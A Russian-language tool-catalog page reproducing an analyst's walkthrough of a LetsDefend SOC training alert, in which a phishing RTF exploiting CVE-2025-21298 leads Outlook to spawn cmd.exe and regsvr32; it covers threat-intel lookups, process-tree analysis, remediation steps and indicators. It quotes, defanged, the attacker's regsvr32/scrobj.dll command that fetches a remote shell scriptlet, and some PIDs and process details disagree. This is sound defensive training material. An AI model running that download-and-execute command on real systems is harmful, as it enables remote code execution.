Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
SOC336-Windows-OLE-Zero-Click-RCE-Exploitation-Detected-CVE-2025-21298 — SOC336 - Обнаружена эксплуатация Windows OLE Zero-Click RCE (CVE-2025-21298) Прохождение | Kitploit
Инструменты/GitHubGitHub/abc1230940/soc336-windows-ole-zero-click-rce-exploitation-detected-cve-2025-21298
Анализ уязвимостейЭксплуатацияЛатеральное перемещениеОбратная инженерияФорензикаФишингАнализ вредоносных программКомандование и УправлениеРазведка угроз
Обучение и Образование
Реагирование на Инциденты
Безопасность Электронной Почты
GitHubabc1230940/soc336-windows-ole-zero-click-rce-exploitation-detected-cve-2025-21298

SOC336-Windows-OLE-Zero-Click-RCE-Exploitation-Detected-CVE-2025-21298

SOC336 - Обнаружена эксплуатация Windows OLE Zero-Click RCE (CVE-2025-21298) Прохождение

РепозиторийСайт
63 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

LinkedIn Gmail Instagram Old Discord Reddit


SOC336 - Обнаружена эксплуатация Windows OLE Zero-Click RCE (CVE-2025-21298) - Пошаговое руководство

phishing email

🔎 Содержание
  1. Ситуация
  • Обзор оповещения
  • Используемые инструменты
  • Анализ
    • Безопасность электронной почты
    • Управление журналами
      • Прокси-журнал
    • Безопасность конечных точек
      • История терминала
      • Сетевые действия
      • Процессы
      • CVE-2025-21298
  • Плейбук
  • Примечание аналитика
  • Ссылки
  • (Наверх)

    Ситуация

    Один из наших сотрудников, Остин, получил фишинговое письмо от подозрительного отправителя, и после того, как он открыл письмо в Outlook, 4 февраля 2025 года в 16:18, было сработано оповещение. Причина срабатывания: "Вредоносное вложение RTF с известным шаблоном эксплуатации CVE-2025-21298" .

    (Наверх)

    Обзор оповещения

    image

    EventID : 314

    Время события : 4 февраля 2025, 16:18 (думаю, это неверно)

    Правило : SOC336 - Обнаружена эксплуатация Windows OLE Zero-Click RCE (CVE-2025-21298)

    Уровень : Аналитик безопасности

    SMTP-адрес : 84.38.130.118

    Адрес источника : [email protected]

    Адрес назначения : [email protected]

    Тема письма : Важно: Требуются действия для предстоящего дедлайна проекта

    Вложение : mail.rtf

    Хэш вложения : df993d037cdb77a435d6993a37e7750dbbb16b2df64916499845b56aa9194184

    Действие устройства : Разрешено

    Причина срабатывания : Обнаружено вредоносное вложение RTF с известным шаблоном эксплуатации CVE-2025-21298.

    (Наверх)

    Используемые инструменты

    1. VirusTotal
    2. AbuseIPDB
    3. Gemini

    (Наверх)

    Анализ

    Погрузимся в журналы безопасности электронной почты, управления журналами и безопасности конечных точек для триажа оповещения.

    Безопасность электронной почты

    Screenshot 2026-05-27 151659

    Я выполнил поиск адреса отправителя projectmanagement@pm[.]me и открыл письмо с темой "Важно: Требуются действия для предстоящего дедлайна проекта", отправленное в 05:12 того же дня, что показалось мне странным, поскольку срочный тон и формулировки, такие как "Важно" и "Требуются действия", дали мне понять, что это фишинговое письмо.



    Screenshot 2026-05-27 175944

    Я выполнил поиск домена pm[.]me в VirusTotal, и только один вендор посчитал его подозрительным.



    Screenshot 2026-05-27 151915

    Однако, когда я выполнил поиск SMTP-адреса 84[.]38[.]130[.]118, 7 вендоров пометили его как вредоносный и содержащий вредоносное ПО, и он был связан с C2-сервером SILVER.



    Screenshot 2026-05-27 180753
    Screenshot 2026-05-27 180810

    84[.]38[.]130[.]118 также был найден в базе данных AbuseIPDB. Он находится в Риге, Латвия, принадлежит домену rixhost.lv и классифицируется как DDoS-атака, взлом и эксплуатируемый хост.



    Screenshot 2026-05-27 152243

    Наконец, я выполнил поиск хэша df993d037cdb77a435d6993a37e7750dbbb16b2df64916499845b56aa9194184 вложения mail.rtf в VirusTotal, и 29 из 61 вендоров пометили вложение как вредоносное. Оно принадлежит семейству вредоносных программ rtfmalformb и связано с уязвимостью CVE-2025-21298.

    Было подтверждено, что Остину было отправлено фишинговое письмо с вредоносным вложением.

    (Наверх)

    Управление журналами

    Давайте проверим, были ли подозрительные действия после 05:12, когда Остин открыл фишинговое письмо.

    Прокси-журнал

    Screenshot 2026-05-27 152515

    Сначала я проверил прокси-журнал и выполнил поиск вредоносного IP-адреса отправителя 84[.]38[.]130[.]118, обнаружив, что в 08:06 был выполнен HTTP GET-запрос к вредоносному IP-адресу по URL hxxp://84[.]38[.]130[.]118/shell[.]sct, инициированный cmd.exe, загружающий файл скриптлета Windows. Код ответа был 200 OK, что указывает на то, что исходящий трафик был разрешен и не заблокирован брандмауэром. Было необычно получить файл скрипта, который возможно содержал скрипт обратной оболочки.

    (Наверх)

    Безопасность конечных точек

    История терминала

    image
    Screenshot 2026-05-27 153447

    Поскольку исходящий трафик на вредоносный IP-адрес был инициирован cmd.exe, я сначала проверил историю терминала и обнаружил, что в 08:06:08 была выполнена команда "C:\Windows\System32\cmd.exe /c regsvr32.exe /s /u /i:hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll" для запуска regsvr32.exe с целью получения файла скрипта с вредоносного IP-адреса с помощью scrobj.dll.

    • regsvr32.exe: утилита командной строки для регистрации и отмены регистрации элементов управления OLE, таких как DLL и элементы ActiveX в реестре Windows.
    • /s: regsvr32.exe выполнялся в фоновом режиме и незаметно.
    • /u: принудительно не добавлять этот ключ в реестр Windows.
    • /i: интерфейс.
    • scrobj.dll: библиотека времени выполнения объектов скриптов, обрабатывающая файлы скриптлетов.

    Использование встроенных утилит Windows для получения скрипта может оставить минимальные следы в системе, усложняя процесс обратной разработки и анализа вредоносного ПО!

    (Наверх)

    Сетевые действия

    Screenshot 2026-05-27 153102

    Было подтверждено, что в 08:06:42 было установлено соединение с вредоносным IP 84[.]38[.]130[.]118 после события выполнения команды.

    (Наверх)

    Процессы

    Итак, почему cmd.exe был выполнен простым кликом по письму? Несмотря на то, что не было найдено никаких доказательств загрузки вредоносного вложения mail.rtf Остином, я проверил журналы конечных точек и выполнил поиск любых событий около 08:06.

    Screenshot 2026-05-27 153636

    Идентификатор процесса: 7023

    Время события: 4 фев 2025 08:06:25

    Командная строка: "regsvr32.exe /s /u /i:hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll"

    Родительский процесс: cmd.exe



    Screenshot 2026-05-27 153616

    Хорошо, тогда давайте посмотрим на родительский процесс cmd.exe.

    Идентификатор процесса: 6784

    Время события: 4 фев 2025 08:06:08

    Командная строка: "regsvr32.exe /s /u /i:hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll"

    Родительский процесс: outlook.exe



    Screenshot 2026-05-27 154136

    И, наконец, проверил родительский процесс outlook.exe.

    Идентификатор процесса: 4820

    Время события: 4 фев 2025 08:05:15

    Командная строка: "C:\Windows\System32\cmd.exe"

    Родительский процесс: explorer.exe



    Итак, мы можем заключить, что вредоносные процессы в виде дерева:

    explorer.exe -> outlook.exe (PID:4820) -> cmd.exe (PID:4784) -> regsvr32.exe (PID:7023) -> ! Выполнение скрипта !

    Однако меня по-прежнему мучил вопрос, как были инициированы вредоносные процессы без загрузки и открытия вредоносного вложения и как outlook.exe породил вредоносный процесс, пока я не нашел информацию о CVE-2025-21298.

    (Наверх)

    CVE-2025-21298

    Screenshot 2026-05-27 201652

    Согласно статье от Offsec, в январе 2025 года была обнаружена критическая уязвимость Windows OLE zero-click, позволяющая выполнить удаленный код (RCE) через электронную почту, с оценкой CVSS 9.8. Когда целевой получатель просто открывает или просматривает в Microsoft Outlook вредоносное письмо, содержащее вредоносный RTF-документ со встроенным скриптом , уязвимость срабатывает, позволяя злоумышленнику выполнить произвольный код в затронутой системе.

    Я провел небольшое исследование Windows OLE и процессов перехвата RTF-документов в Google и Gemini, а также связал это с моими знаниями в области обратной разработки:

    1. При открытии или просмотре RTF-документа функция UtOlePresStmToContentsStm внутри ole32.dll, объект OLE, указываемый pstmContents, считывает данные изображения миниатюры (OlePres) и сбрасывает их в фактический файл данных (CONTENT).
    2. Функция немедленно запускает неожиданную ошибку обработки из-за поврежденного формата RTF-файла злоумышленника, что приводит к удалению объекта OLE, но не указателя pstmContents.
    3. Вредоносный RTF-файл создает вредоносный объект OLE, содержащий вредоносный код точно такого же размера, как удаленный объект OLE, занимая то же пространство памяти, на которое все еще указывает указатель pstmContents.
    4. После завершения предварительного просмотра Outlook выполняет фиктивный процесс "очистки", содержащий вредоносный код "regsvr32.exe /s /u /i:hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll" внутри вредоносного поддельного объекта OLE.
    5. Система жертвы выполняет удаленную полезную нагрузку и автоматически устанавливает обратную оболочку без каких-либо кликов.

    (Наверх)

    Плейбук

    Screenshot 2026-05-28 144059
    Screenshot 2026-05-28 144109
    Screenshot 2026-05-28 144141
    Screenshot 2026-05-28 144154
    Screenshot 2026-05-28 144226
    Screenshot 2026-05-28 144240

    Не помещен в карантин

    Screenshot 2026-05-28 144252

    Вредоносное

    Screenshot 2026-05-28 144306

    Доступ получен

    Screenshot 2026-05-28 144316
    Screenshot 2026-05-28 144343
    Screenshot 2026-05-28 144730
    Screenshot 2026-05-28 144804
    Screenshot 2026-05-28 144844
    Screenshot 2026-05-28 144940
    Screenshot 2026-05-28 145001

    (Наверх)

    Примечание аналитика

    Классификация: Критическая

    Тип: Вредоносное ПО

    Время активности:

    4 фев 2025, 05:12 (получено фишинговое письмо)

    4 фев 2025, 08:05:15 - 4 фев 2025, 08:06:42 (фишинговое письмо открыто и выполнен вредоносный код)

    Затронутые сущности:

    Адрес источника: projectmanagement@pm[.]me

    SMTP-адрес: 84[.]38[.]130[.]118

    Адрес электронной почты получателя: Austin@letsdefend[.]io

    IP-адрес получателя: 172[.]16[.]17[.]137

    Имя хоста: Austin

    Причины верного срабатывания:

    4 февраля 2025 года в 05:12 с адреса [email protected] (IP-адрес: 84.38.130.118) на адрес [email protected] (IP-адрес: 172.16.17.137) было отправлено подозрительное письмо с темой "Важно: Требуются действия для предстоящего дедлайна проекта", содержащее вложение mail.rtf (SHA256-хэш: df993d037cdb77a435d6993a37e7750dbbb16b2df64916499845b56aa9194184). Срочный тон и формулировки, использованные в теме, дали понять, что это фишинговое письмо. Threat Intel (VirusTotal и AbuseIPDB) пометили IP-адрес отправителя, расположенный в Риге, Латвия, принадлежащий домену rixhost.lv, а также вложение как вредоносные.

    Согласно прокси-журналам, в 08:06 был выполнен HTTP GET-запрос к вредоносному IP-адресу по URL hxxp://84[.]38[.]130[.]118/shell[.]sct, инициированный cmd.exe, загружающий файл скриптлета Windows. Код ответа был 200 OK, что указывает на то, что исходящий трафик к вредоносному IP-адресу был разрешен и не заблокирован брандмауэром.

    Согласно журналам безопасности конечных точек, вредоносный код "regsvr32.exe /s /u /i:hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll" (PID: 7023) был инициирован cmd.exe (PID: 6784), порожденным outlook.exe (PID: 4820).

    Эксплуатация была вызвана критической уязвимостью Windows OLE zero-click (CVE-2025-21298), позволяющей выполнить удаленный код (RCE) через электронную почту, с оценкой CVSS 9.8 в январе 2025 года. Когда целевой получатель просто открывает или просматривает в Microsoft Outlook вредоносное письмо, содержащее вредоносный RTF-документ со встроенным скриптом, уязвимость срабатывает, позволяя злоумышленнику выполнить произвольный код в затронутой системе, потенциально устанавливая обратную оболочку на C2-сервер.

    Причины для эскалации:

    Хотя активный поствзломный C2-сетевой трафик еще не был окончательно обнаружен, журналы безопасности конечных точек подтвердили выполнение regsvr32.exe с использованием scrobj.dll для получения файла скриптлета shell.sct. Из-за оценки CVSS 9.8 уязвимости CVE-2025-21298 требуется дальнейшее расследование для проверки наличия подозрительной активности на хосте, такой как сохранение доступа или кража данных.

    Меры по устранению:

    • Немедленно отключите хост Austin от корпоративной внутренней сети.
    • Завершите процесс "regsvr32.exe /s /u /i:hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll" и связанные с ним процессы cmd.exe, outlook.exe.
    • Заблокируйте исходящий трафик на 84[.]38[.]130[.]118.
    • Внесите домен rixhost[.]lv в черный список.
    • Внесите отправителя projectmanagement@pm[.]me в черный список на почтовом сервере.
    • Установите исправление для уязвимости CVE-2025-21298.
    • Сбросьте учетные данные Остина.
    • Выполните анализ памяти на хосте Austin для расследования вредоносных действий, таких как C2-соединение, сохранение доступа, кража данных после выполнения shell.sct.
    • Выполните обратную разработку shell.sct.
    • Выполните анализ электронной почты для расследования исходного IP-адреса, обратного адреса в заголовке письма.
    • Заблокируйте доступ в Интернет, инициированный regsvr32.exe.
    • Проведите информационную кампанию по повышению осведомленности о фишинге, чтобы обучить сотрудников не открывать письма от неизвестных отправителей или со срочным тоном/формулировками.

    Индикаторы компрометации:

    • Адрес отправителя: projectmanagement@pm[.]me
    • IP-адрес отправителя: 84[.]38[.]130[.]118 Домен отправителя: rixhost[.]lv
    • Фишинговое письмо: "Важно: Требуется действие для предстоящего крайнего срока проекта"
    • Вредоносный документ: mail.rtf (SHA256 hash: df993d037cdb77a435d6993a37e7750dbbb16b2df64916499845b56aa9194184)
    • Вредоносное дерево процессов: outlook.exe (PID: 4820) -> cmd.exe (PID: 6784) -> regsvr32.exe /s /u /i:hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll" (PID: 7023)
    • URL второй полезной нагрузки: hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll

    (К началу)

    Ссылки

    Подробности CVE-2025-21298

    CVE-2025-21298: Критическая уязвимость Windows OLE с нулевым кликом

    (К началу)

    Скачать инструмент